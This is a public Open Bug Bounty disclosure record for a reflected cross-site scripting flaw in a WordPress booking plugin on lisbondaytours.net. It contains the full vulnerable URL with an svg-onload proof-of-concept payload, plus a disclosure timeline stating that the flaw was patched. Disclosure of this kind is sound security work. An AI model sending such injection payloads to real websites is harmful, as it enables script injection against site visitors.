lisbondaytours.net XSS vulnerability

2017-10-31T05:29:00
ID OBB:381908
Type openbugbounty
Reporter eb
Modified 2017-12-03T12:29:00

Description

Vulnerable URL:
http://lisbondaytours.net/wp-content/plugins/rezgo-online-booking-new/frame_router.php?mode=index&title;=%3C/title%3E%22%3E%3Csvg/onload=prompt%28/OPENBUGBOUNTY/%29%3E\n
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 31 October, 2017 05:29 GMT
Generic security notifications sent to website owner| 31 October, 2017 05:55 GMT
Vulnerability details disclosed by researcher| 2 December, 2017 19:16 GMT
Vulnerability patched by the website owner| 3 December, 2017 12:29 GMT